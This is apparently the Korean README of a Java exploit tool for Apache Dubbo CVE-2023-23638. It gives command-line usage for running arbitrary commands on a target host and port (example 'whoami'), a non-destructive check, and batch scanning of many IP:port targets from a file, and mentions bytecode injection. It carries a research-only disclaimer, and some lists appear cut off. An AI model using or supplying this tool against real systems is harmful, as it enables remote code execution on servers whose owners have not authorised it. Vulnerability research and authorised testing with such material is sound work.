
Apache Dubbo (CVE-2023-23638) 취약점 악용의 엔지니어링 실무
Apache Dubbo (CVE-2023-23638) 취약점 악용의 엔지니어링 실무로, Dubbo 3.x에서 서비스 디스커버리부터 취약점 악용 및 에코까지의 과정을 다룹니다. 본 도구는 연구 및 학습 목적으로만 제공되며, 각별한 고수님들의 의견과 귀중한 제안을 환영합니다.
본 도구는 Dubbo 3.x에서 CVE-2023-23638의 완전한 악용을 지원하며, 서비스 디스커버리부터 취약점 악용 및 에코까지 다룹니다. Dubbo 2.x 버전에서도 악용할 수 있으며, 서비스 이름, 메서드 이름 등을 직접 전달해야 합니다. 이 취약점에 대해 두 편의 분석 글을 작성했습니다:
본 도구는 학습 용도로만 제작되었으며, 실전에서의 여러 문제를 고려하지 않았습니다. 예를 들어:
추후 계속 업데이트 예정
이 프로젝트는 더 이상 업데이트되지 않습니다. Dubbo에 대한 더 포괄적인 스캔 및 악용 기능은 추후 다른 프로젝트에서 오픈소스로 공개될 예정이니 기대해 주세요!
y4tacker 님이 공유해 주신 fastjson 네이티브 역직렬화 아이디어에 감사드립니다.
단일 URL 취약점 악용
java -jar CVE-2023-23638.jar TARGET_IP TARGET_PORT COMMAND CHARSET(default UTF-8)
e.g.:
java -jar CVE-2023-23638.jar 127.0.0.1 20880 whoami
단일 URL 무손상 탐지
java -jar CVE-2023-23638.jar -s TARGET_IP TARGET_PORT
e.g.:
java -jar CVE-2023-23638.jar -s 127.0.0.1 20880
일괄 탐지
1.txt:
127.0.0.1:20880
192.168.1.1:20880
java -jar CVE-2023-23638.jar -f FILE_PATH
e.g.:
java -jar CVE-2023-23638.jar -f 1.txt
바이트코드 주입

명령 실행

본 도구는 취약점 연구 및 학습용으로만 제공됩니다. 도구의 사용 가능성을 테스트하려면 직접 타깃 환경을 구축하십시오. 본 도구를 사용하여 탐지를 수행할 때, 해당 행위가 현지 법률 및 규정을 준수하고 충분한 승인을 받았는지 확인해야 합니다. 승인되지 않은 대상을 스캔하지 마십시오. 본 도구를 사용하는 과정에서 어떠한 불법 행위가 발생할 경우, 그에 따른 모든 결과는 사용자 본인이 부담해야 하며, 우리는 어떠한 법적 책임 및 연대 책임도 지지 않습니다.